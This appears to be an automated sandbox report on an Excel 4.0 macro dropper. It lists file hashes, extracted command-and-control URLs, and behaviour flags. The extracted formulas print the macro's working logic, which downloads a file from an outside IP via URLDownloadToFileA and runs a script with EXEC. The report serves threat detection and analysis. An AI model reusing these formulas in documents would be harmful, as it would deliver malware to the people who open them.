General

  • Target

    cda018259ed8d767a8cdfc26af5e87ef

  • Size

    6KB

  • Sample

    231222-r8k8wadfgm

  • MD5

    cda018259ed8d767a8cdfc26af5e87ef

  • SHA1

    e0a40b056325ce3ad3dc90a17eb17c0640409bb2

  • SHA256

    17044a8914cea7bcfaa1ff271edefe5fb0d2b4c6b0c92563cb8be4c436b5bf24

  • SHA512

    377255d08df7f2310cc9787329862e85c093b9e3bea6800749466826fa6875cb0b16c75cd9d4d1c2a43b5888100021cda9de8a3bda94aa495e97171a7dfddec6

  • SSDEEP

    192:NDSzGuSgbrA2OmmfRn8UhHFBFYu5b98yuVqu+X:NRuxM2wd1FYYb98yuEL

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

xlm40.dropper

http://google.com/index.php

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

Targets

    • Target

      cda018259ed8d767a8cdfc26af5e87ef

    • Size

      6KB

    • MD5

      cda018259ed8d767a8cdfc26af5e87ef

    • SHA1

      e0a40b056325ce3ad3dc90a17eb17c0640409bb2

    • SHA256

      17044a8914cea7bcfaa1ff271edefe5fb0d2b4c6b0c92563cb8be4c436b5bf24

    • SHA512

      377255d08df7f2310cc9787329862e85c093b9e3bea6800749466826fa6875cb0b16c75cd9d4d1c2a43b5888100021cda9de8a3bda94aa495e97171a7dfddec6

    • SSDEEP

      192:NDSzGuSgbrA2OmmfRn8UhHFBFYu5b98yuVqu+X:NRuxM2wd1FYYb98yuEL

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Process spawned suspicious child process

      This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

MITRE ATT&CK Enterprise v15

Tasks